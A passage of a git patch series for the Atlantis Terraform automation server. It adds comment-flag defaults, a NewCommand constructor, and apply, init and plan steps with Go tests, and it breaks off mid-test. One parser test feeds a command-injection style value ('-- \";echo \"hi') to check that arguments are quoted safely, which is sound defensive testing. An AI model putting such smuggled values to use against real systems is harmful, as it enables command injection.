From 8ee16a0281b0180c1ca9986a67a99d9c3cb98bd8 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 21 Mar 2018 17:12:17 -0700
Subject: [PATCH 01/69] By default atlantis plan will run in root dir.

This change makes things cleaner because there will only ever be one
plan generated in the comment flow. It's okay to make this change
because typing the plan command a couple times isn't too bad AND we're
going to be implementing autoplanning which should handle most of the
times you needed to type plan from before.
---
 server/events/comment_parser.go      | 13 ++++----
 server/events/comment_parser_test.go | 25 ++++++---------
 server/events/event_parser.go        | 33 +++++++++++++++----
 server/events/event_parser_test.go   | 48 ++++++++++++++++++++++++++++
 4 files changed, 91 insertions(+), 28 deletions(-)

diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index d0e921d79e..2c9e1b0c1b 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -31,6 +31,8 @@ const (
 	DirFlagShort       = "d"
 	VerboseFlagLong    = "verbose"
 	VerboseFlagShort   = ""
+	DefaultWorkspace   = "default"
+	DefaultDir         = "."
 )
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_comment_parsing.go CommentParsing
@@ -135,21 +137,20 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 	var name CommandName
 
 	// Set up the flag parsing depending on the command.
-	const defaultWorkspace = "default"
 	switch command {
 	case Plan.String():
 		name = Plan
 		flagSet = pflag.NewFlagSet(Plan.String(), pflag.ContinueOnError)
 		flagSet.SetOutput(ioutil.Discard)
-		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Switch to this Terraform workspace before planning.")
-		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Which directory to run plan in relative to root of repo. Use '.' for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.")
+		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.")
+		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.")
 		flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
 	case Apply.String():
 		name = Apply
 		flagSet = pflag.NewFlagSet(Apply.String(), pflag.ContinueOnError)
 		flagSet.SetOutput(ioutil.Discard)
-		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Apply the plan for this Terraform workspace.")
-		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Apply the plan for this directory, relative to root of repo. Use '.' for root. If not specified, will run apply against all plans created for this workspace.")
+		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.")
+		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.")
 		flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
 	default:
 		return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)}
@@ -198,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 	}
 
 	return CommentParseResult{
-		Command: &Command{Name: name, Verbose: verbose, Workspace: workspace, Dir: dir, Flags: extraArgs},
+		Command: NewCommand(dir, extraArgs, name, verbose, workspace),
 	}
 }
 
diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go
index 87b14f358b..81fe4da9f8 100644
--- a/server/events/comment_parser_test.go
+++ b/server/events/comment_parser_test.go
@@ -31,8 +31,6 @@ var commentParser = events.CommentParser{
 }
 
 func TestParse_Ignored(t *testing.T) {
-	t.Log("given a comment that should be ignored we should set " +
-		"CommentParseResult.Ignore to true")
 	ignoreComments := []string{
 		"",
 		"a",
@@ -47,8 +45,6 @@ func TestParse_Ignored(t *testing.T) {
 }
 
 func TestParse_HelpResponse(t *testing.T) {
-	t.Log("given a comment that should result in help output we " +
-		"should set CommentParseResult.CommentResult")
 	helpComments := []string{
 		"run",
 		"atlantis",
@@ -271,7 +267,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"",
 			"default",
-			"",
+			".",
 			false,
 			"",
 		},
@@ -279,7 +275,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"-w workspace",
 			"workspace",
-			"",
+			".",
 			false,
 			"",
 		},
@@ -293,7 +289,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"--verbose",
 			"default",
-			"",
+			".",
 			true,
 			"",
 		},
@@ -330,7 +326,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"-w workspace -- -d dir --verbose",
 			"workspace",
-			"",
+			".",
 			false,
 			"\"-d\" \"dir\" \"--verbose\"",
 		},
@@ -338,7 +334,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"--",
 			"default",
-			"",
+			".",
 			false,
 			"",
 		},
@@ -346,7 +342,7 @@ func TestParse_Parsing(t *testing.T) {
 		{
 			"-- \";echo \"hi",
 			"default",
-			"",
+			".",
 			false,
 			`"\";echo" "\"hi"`,
 		},
@@ -430,10 +426,8 @@ func TestParse_Parsing(t *testing.T) {
 }
 
 var PlanUsage = `Usage of plan:
-  -d, --dir string         Which directory to run plan in relative to root of repo.
-                           Use '.' for root. If not specified, will attempt to run
-                           plan for all Terraform projects we think were modified in
-                           this changeset.
+  -d, --dir string         Which directory to run plan in relative to root of repo,
+                           ex. 'child/dir'. (default ".")
       --verbose            Append Atlantis log to comment.
   -w, --workspace string   Switch to this Terraform workspace before planning.
                            (default "default")
@@ -441,8 +435,7 @@ var PlanUsage = `Usage of plan:
 
 var ApplyUsage = `Usage of apply:
   -d, --dir string         Apply the plan for this directory, relative to root of
-                           repo. Use '.' for root. If not specified, will run apply
-                           against all plans created for this workspace.
+                           repo, ex. 'child/dir'. (default ".")
       --verbose            Append Atlantis log to comment.
   -w, --workspace string   Apply the plan for this Terraform workspace. (default
                            "default")
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index d42e4beda0..cd3e36f5b3 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -14,6 +14,7 @@
 package events
 
 import (
+	"path"
 	"regexp"
 
 	"github.com/google/go-github/github"
@@ -32,14 +33,34 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`)
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing
 
 type Command struct {
-	Name      CommandName
-	Workspace string
-	Verbose   bool
-	Flags     []string
 	// Dir is the path relative to the repo root to run the command in.
-	// If empty string then it wasn't specified. "." is the root of the repo.
-	// Dir will never end in "/".
+	// Will never be an empty string and will never end in "/".
 	Dir string
+	// Flags are the extra arguments appended to comment,
+	// ex. atlantis plan -- -target=resource
+	Flags     []string
+	Name      CommandName
+	Verbose   bool
+	Workspace string
+}
+
+// NewCommand constructs a Command, setting all missing fields to defaults.
+func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command {
+	// If dir was an empty string, this will return '.'.
+	validDir := path.Clean(dir)
+	if validDir == "/" {
+		validDir = "."
+	}
+	if workspace == "" {
+		workspace = DefaultWorkspace
+	}
+	return &Command{
+		Dir:       validDir,
+		Flags:     flags,
+		Name:      name,
+		Verbose:   verbose,
+		Workspace: workspace,
+	}
 }
 
 type EventParsing interface {
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index 9928dc69c9..dbd4b515e4 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -257,6 +257,54 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) {
 	}, user)
 }
 
+func TestNewCommand_CleansDir(t *testing.T) {
+	cases := []struct {
+		Dir    string
+		ExpDir string
+	}{
+		{
+			"",
+			".",
+		},
+		{
+			"/",
+			".",
+		},
+		{
+			"./",
+			".",
+		},
+		// We rely on our callers to not pass in relative dirs.
+		{
+			"..",
+			"..",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.Dir, func(t *testing.T) {
+			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace")
+			Equals(t, c.ExpDir, cmd.Dir)
+		})
+	}
+}
+
+func TestNewCommand_EmptyWorkspace(t *testing.T) {
+	cmd := events.NewCommand("dir", nil, events.Plan, false, "")
+	Equals(t, "default", cmd.Workspace)
+}
+
+func TestNewCommand_AllFieldsSet(t *testing.T) {
+	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace")
+	Equals(t, events.Command{
+		Workspace: "workspace",
+		Dir:       "dir",
+		Verbose:   true,
+		Flags:     []string{"a", "b"},
+		Name:      events.Plan,
+	}, *cmd)
+}
+
 var mergeEventJSON = `{
   "object_kind": "merge_request",
   "user": {

From 6dc0e3c3f355bb5565b1d2eed658aa92fc9cd8a4 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 22 Mar 2018 11:56:33 -0700
Subject: [PATCH 02/69] Implement apply step.

---
 server/events/atlantisyaml/apply_step.go      | 28 ++++++
 server/events/atlantisyaml/apply_step_test.go | 89 +++++++++++++++++++
 2 files changed, 117 insertions(+)
 create mode 100644 server/events/atlantisyaml/apply_step.go
 create mode 100644 server/events/atlantisyaml/apply_step_test.go

diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/atlantisyaml/apply_step.go
new file mode 100644
index 0000000000..c75d4ae3c2
--- /dev/null
+++ b/server/events/atlantisyaml/apply_step.go
@@ -0,0 +1,28 @@
+package atlantisyaml
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/runatlantis/atlantis/server/events/vcs"
+)
+
+// ApplyStep runs `terraform apply`.
+type ApplyStep struct {
+	ExtraArgs         []string
+	VCSClient         vcs.ClientProxy
+	TerraformExecutor TerraformExec
+	Meta              StepMeta
+}
+
+func (a *ApplyStep) Run() (string, error) {
+	planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan")
+	stat, err := os.Stat(planPath)
+	if err != nil || stat.IsDir() {
+		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace)
+	}
+
+	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath)
+	return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace)
+}
diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go
new file mode 100644
index 0000000000..081774ace1
--- /dev/null
+++ b/server/events/atlantisyaml/apply_step_test.go
@@ -0,0 +1,89 @@
+package atlantisyaml_test
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/hashicorp/go-version"
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoDir(t *testing.T) {
+	s := atlantisyaml.ApplyStep{
+		Meta: atlantisyaml.StepMeta{
+			Workspace:             "workspace",
+			AbsolutePath:          "nonexistent/path",
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      nil,
+			ExtraCommentArgs:      nil,
+			Username:              "username",
+		},
+	}
+	_, err := s.Run()
+	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_NoPlanFile(t *testing.T) {
+	tmpDir, cleanup := applyTestTmpDir(t)
+	defer cleanup()
+
+	s := atlantisyaml.ApplyStep{
+		Meta: atlantisyaml.StepMeta{
+			Workspace:             "workspace",
+			AbsolutePath:          tmpDir,
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      nil,
+			ExtraCommentArgs:      nil,
+			Username:              "username",
+		},
+	}
+	_, err := s.Run()
+	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_Success(t *testing.T) {
+	tmpDir, cleanup := applyTestTmpDir(t)
+	defer cleanup()
+	planPath := filepath.Join(tmpDir, "workspace.tfplan")
+	err := ioutil.WriteFile(planPath, nil, 0644)
+	Ok(t, err)
+
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+
+	tfVersion, _ := version.NewVersion("0.11.4")
+	s := atlantisyaml.ApplyStep{
+		Meta: atlantisyaml.StepMeta{
+			Workspace:             "workspace",
+			AbsolutePath:          tmpDir,
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      tfVersion,
+			ExtraCommentArgs:      []string{"comment", "args"},
+			Username:              "username",
+		},
+		ExtraArgs:         []string{"extra", "args"},
+		TerraformExecutor: terraform,
+	}
+
+	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+		ThenReturn("output", nil)
+	output, err := s.Run()
+	Ok(t, err)
+	Equals(t, "output", output)
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
+}
+
+// applyTestTmpDir creates a temporary directory and returns its path along
+// with a cleanup function to be called via defer.
+func applyTestTmpDir(t *testing.T) (string, func()) {
+	tmpDir, err := ioutil.TempDir("", "")
+	Ok(t, err)
+	return tmpDir, func() { os.RemoveAll(tmpDir) }
+}

From 692e4144ed7c9daf9cc6557f57ebf515a6bc9b73 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 22 Mar 2018 12:09:08 -0700
Subject: [PATCH 03/69] Implement init step.

---
 server/events/atlantisyaml/init_step.go      | 32 +++++++++
 server/events/atlantisyaml/init_step_test.go | 70 ++++++++++++++++++++
 2 files changed, 102 insertions(+)
 create mode 100644 server/events/atlantisyaml/init_step.go
 create mode 100644 server/events/atlantisyaml/init_step_test.go

diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go
new file mode 100644
index 0000000000..a25cb94fe4
--- /dev/null
+++ b/server/events/atlantisyaml/init_step.go
@@ -0,0 +1,32 @@
+package atlantisyaml
+
+import "github.com/hashicorp/go-version"
+
+// InitStep runs `terraform init`.
+type InitStep struct {
+	ExtraArgs         []string
+	TerraformExecutor TerraformExec
+	Meta              StepMeta
+}
+
+func (i *InitStep) Run() (string, error) {
+	// If we're running < 0.9 we have to use `terraform get` instead of `init`.
+	if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) {
+		i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion)
+		terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...)
+		_, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace)
+		return "", err
+	} else {
+		_, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace)
+		return "", err
+	}
+}
+
+// MustConstraint returns a constraint. It panics on error.
+func MustConstraint(constraint string) version.Constraints {
+	c, err := version.NewConstraint(constraint)
+	if err != nil {
+		panic(err)
+	}
+	return c
+}
diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/atlantisyaml/init_step_test.go
new file mode 100644
index 0000000000..8704f832df
--- /dev/null
+++ b/server/events/atlantisyaml/init_step_test.go
@@ -0,0 +1,70 @@
+package atlantisyaml_test
+
+import (
+	"testing"
+
+	"github.com/hashicorp/go-version"
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
+	RegisterMockTestingT(t)
+	cases := []struct {
+		version string
+		expCmd  string
+	}{
+		{
+			"0.8.9",
+			"get",
+		},
+		{
+			"0.9.0",
+			"init",
+		},
+		{
+			"0.9.1",
+			"init",
+		},
+		{
+			"0.10.0",
+			"init",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.version, func(t *testing.T) {
+			terraform := mocks.NewMockClient()
+
+			tfVersion, _ := version.NewVersion(c.version)
+			logger := logging.NewNoopLogger()
+			s := atlantisyaml.InitStep{
+				Meta: atlantisyaml.StepMeta{
+					Log:                   logger,
+					Workspace:             "workspace",
+					AbsolutePath:          "/path",
+					DirRelativeToRepoRoot: ".",
+					TerraformVersion:      tfVersion,
+					ExtraCommentArgs:      []string{"comment", "args"},
+					Username:              "username",
+				},
+				ExtraArgs:         []string{"extra", "args"},
+				TerraformExecutor: terraform,
+			}
+
+			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+				ThenReturn("output", nil)
+			output, err := s.Run()
+			Ok(t, err)
+			// Shouldn't return output since we don't print init output to PR.
+			Equals(t, "", output)
+
+			terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expCmd, "-no-color", "extra", "args"}, tfVersion, "workspace")
+		})
+	}
+}

From 464cd51eaeb65466bfbb2da7b457fd49bb0a55a4 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 22 Mar 2018 13:36:56 -0700
Subject: [PATCH 04/69] Implement plan step.

---
 server/events/atlantisyaml/apply_step_test.go |   8 +-
 server/events/atlantisyaml/plan_step.go       |  94 ++++++
 server/events/atlantisyaml/plan_step_test.go  | 285 ++++++++++++++++++
 3 files changed, 383 insertions(+), 4 deletions(-)
 create mode 100644 server/events/atlantisyaml/plan_step.go
 create mode 100644 server/events/atlantisyaml/plan_step_test.go

diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go
index 081774ace1..0502ab2e1f 100644
--- a/server/events/atlantisyaml/apply_step_test.go
+++ b/server/events/atlantisyaml/apply_step_test.go
@@ -31,7 +31,7 @@ func TestRun_NoDir(t *testing.T) {
 }
 
 func TestRun_NoPlanFile(t *testing.T) {
-	tmpDir, cleanup := applyTestTmpDir(t)
+	tmpDir, cleanup := tmpDir_stepTests(t)
 	defer cleanup()
 
 	s := atlantisyaml.ApplyStep{
@@ -49,7 +49,7 @@ func TestRun_NoPlanFile(t *testing.T) {
 }
 
 func TestRun_Success(t *testing.T) {
-	tmpDir, cleanup := applyTestTmpDir(t)
+	tmpDir, cleanup := tmpDir_stepTests(t)
 	defer cleanup()
 	planPath := filepath.Join(tmpDir, "workspace.tfplan")
 	err := ioutil.WriteFile(planPath, nil, 0644)
@@ -80,9 +80,9 @@ func TestRun_Success(t *testing.T) {
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
 }
 
-// applyTestTmpDir creates a temporary directory and returns its path along
+// tmpDir_stepTests creates a temporary directory and returns its path along
 // with a cleanup function to be called via defer.
-func applyTestTmpDir(t *testing.T) (string, func()) {
+func tmpDir_stepTests(t *testing.T) (string, func()) {
 	tmpDir, err := ioutil.TempDir("", "")
 	Ok(t, err)
 	return tmpDir, func() { os.RemoveAll(tmpDir) }
diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/atlantisyaml/plan_step.go
new file mode 100644
index 0000000000..646506381b
--- /dev/null
+++ b/server/events/atlantisyaml/plan_step.go
@@ -0,0 +1,94 @@
+package atlantisyaml
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+)
+
+// atlantisUserTFVar is the name of the variable we execute terraform
+// with, containing the vcs username of who is running the command
+const atlantisUserTFVar = "atlantis_user"
+const defaultWorkspace = "default"
+
+// PlanStep runs `terraform plan`.
+type PlanStep struct {
+	ExtraArgs         []string
+	TerraformExecutor TerraformExec
+	Meta              StepMeta
+}
+
+func (p *PlanStep) Run() (string, error) {
+	// We only need to switch workspaces in version 0.9.*. In older versions,
+	// there is no such thing as a workspace so we don't need to do anything.
+	// In newer versions, the TF_WORKSPACE env var is respected and will handle
+	// using the right workspace and even creating it if it doesn't exist.
+	// This variable is set inside the Terraform executor.
+	if err := p.switchWorkspace(); err != nil {
+		return "", err
+	}
+
+	planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace))
+	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username)
+	tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...)
+
+	// Check if env/{workspace}.tfvars exist and include it. This is a use-case
+	// from Hootsuite where Atlantis was first created so we're keeping this as
+	// an homage and a favor so they don't need to refactor all their repos.
+	// It's also a nice way to structure your repos to reduce duplication.
+	optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars")
+	if _, err := os.Stat(optionalEnvFile); err == nil {
+		tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile)
+	}
+
+	return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace)
+}
+
+// switchWorkspace changes the terraform workspace if necessary and will create
+// it if it doesn't exist. It handles differences between versions.
+func (p *PlanStep) switchWorkspace() error {
+	// In versions less than 0.9 there is no support for workspaces.
+	noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion)
+	if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace {
+		return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion)
+	}
+	if noWorkspaceSupport {
+		return nil
+	}
+
+	// In version 0.9.* the workspace command was called env.
+	workspaceCmd := "workspace"
+	runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion)
+	if runningZeroPointNine {
+		workspaceCmd = "env"
+	}
+
+	// Use `workspace show` to find out what workspace we're in now. If we're
+	// already in the right workspace then no need to switch. This will save us
+	// about ten seconds. This command is only available in > 0.10.
+	if !runningZeroPointNine {
+		workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		if err != nil {
+			return err
+		}
+		// If `show` says we're already on this workspace then we're done.
+		if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace {
+			return nil
+		}
+	}
+
+	// Finally we'll have to select the workspace. Although we end up running
+	// with TF_WORKSPACE set, we need to figure out if this workspace exists so
+	// we can create it if it doesn't. To do this we can either select and catch
+	// the error or use list and then look for the workspace. Both commands take
+	// the same amount of time so that's why we're running select here.
+	_, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+	if err != nil {
+		// If terraform workspace select fails we run terraform workspace
+		// new to create a new workspace automatically.
+		_, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		return err
+	}
+	return nil
+}
diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/atlantisyaml/plan_step_test.go
new file mode 100644
index 0000000000..d5d7502992
--- /dev/null
+++ b/server/events/atlantisyaml/plan_step_test.go
@@ -0,0 +1,285 @@
+package atlantisyaml_test
+
+import (
+	"errors"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/hashicorp/go-version"
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events/atlantisyaml"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoWorkspaceIn08(t *testing.T) {
+	// We don't want any workspace commands to be run in 0.8.
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+
+	tfVersion, _ := version.NewVersion("0.8")
+	logger := logging.NewNoopLogger()
+	workspace := "default"
+	s := atlantisyaml.PlanStep{
+		Meta: atlantisyaml.StepMeta{
+			Log:                   logger,
+			Workspace:             workspace,
+			AbsolutePath:          "/path",
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      tfVersion,
+			ExtraCommentArgs:      []string{"comment", "args"},
+			Username:              "username",
+		},
+		ExtraArgs:         []string{"extra", "args"},
+		TerraformExecutor: terraform,
+	}
+
+	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+		ThenReturn("output", nil)
+	output, err := s.Run()
+	Ok(t, err)
+
+	Equals(t, "output", output)
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, workspace)
+
+	// Verify that no env or workspace commands were run
+	terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"env", "select", "-no-color", "workspace"}, tfVersion, workspace)
+	terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, workspace)
+}
+
+func TestRun_ErrWorkspaceIn08(t *testing.T) {
+	// If they attempt to use a workspace other than default in 0.8
+	// we should error.
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+
+	tfVersion, _ := version.NewVersion("0.8")
+	logger := logging.NewNoopLogger()
+	workspace := "notdefault"
+	s := atlantisyaml.PlanStep{
+		Meta: atlantisyaml.StepMeta{
+			Log:                   logger,
+			Workspace:             workspace,
+			AbsolutePath:          "/path",
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      tfVersion,
+			ExtraCommentArgs:      []string{"comment", "args"},
+			Username:              "username",
+		},
+		ExtraArgs:         []string{"extra", "args"},
+		TerraformExecutor: terraform,
+	}
+
+	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+		ThenReturn("output", nil)
+	_, err := s.Run()
+	ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err)
+}
+
+func TestRun_SwitchesWorkspace(t *testing.T) {
+	RegisterMockTestingT(t)
+
+	cases := []struct {
+		tfVersion       string
+		expWorkspaceCmd string
+	}{
+		{
+			"0.9.0",
+			"env",
+		},
+		{
+			"0.9.11",
+			"env",
+		},
+		{
+			"0.10.0",
+			"workspace",
+		},
+		{
+			"0.11.0",
+			"workspace",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.tfVersion, func(t *testing.T) {
+			terraform := mocks.NewMockClient()
+
+			tfVersion, _ := version.NewVersion(c.tfVersion)
+			logger := logging.NewNoopLogger()
+			s := atlantisyaml.PlanStep{
+				Meta: atlantisyaml.StepMeta{
+					Log:                   logger,
+					Workspace:             "workspace",
+					AbsolutePath:          "/path",
+					DirRelativeToRepoRoot: ".",
+					TerraformVersion:      tfVersion,
+					ExtraCommentArgs:      []string{"comment", "args"},
+					Username:              "username",
+				},
+				ExtraArgs:         []string{"extra", "args"},
+				TerraformExecutor: terraform,
+			}
+
+			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+				ThenReturn("output", nil)
+			output, err := s.Run()
+			Ok(t, err)
+
+			Equals(t, "output", output)
+			// Verify that env select was called as well as plan.
+			terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expWorkspaceCmd, "select", "-no-color", "workspace"}, tfVersion, "workspace")
+			terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, "workspace")
+		})
+	}
+}
+
+func TestRun_CreatesWorkspace(t *testing.T) {
+	// Test that if `workspace select` fails, we call `workspace new`.
+	RegisterMockTestingT(t)
+
+	cases := []struct {
+		tfVersion           string
+		expWorkspaceCommand string
+	}{
+		{
+			"0.9.0",
+			"env",
+		},
+		{
+			"0.9.11",
+			"env",
+		},
+		{
+			"0.10.0",
+			"workspace",
+		},
+		{
+			"0.11.0",
+			"workspace",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.tfVersion, func(t *testing.T) {
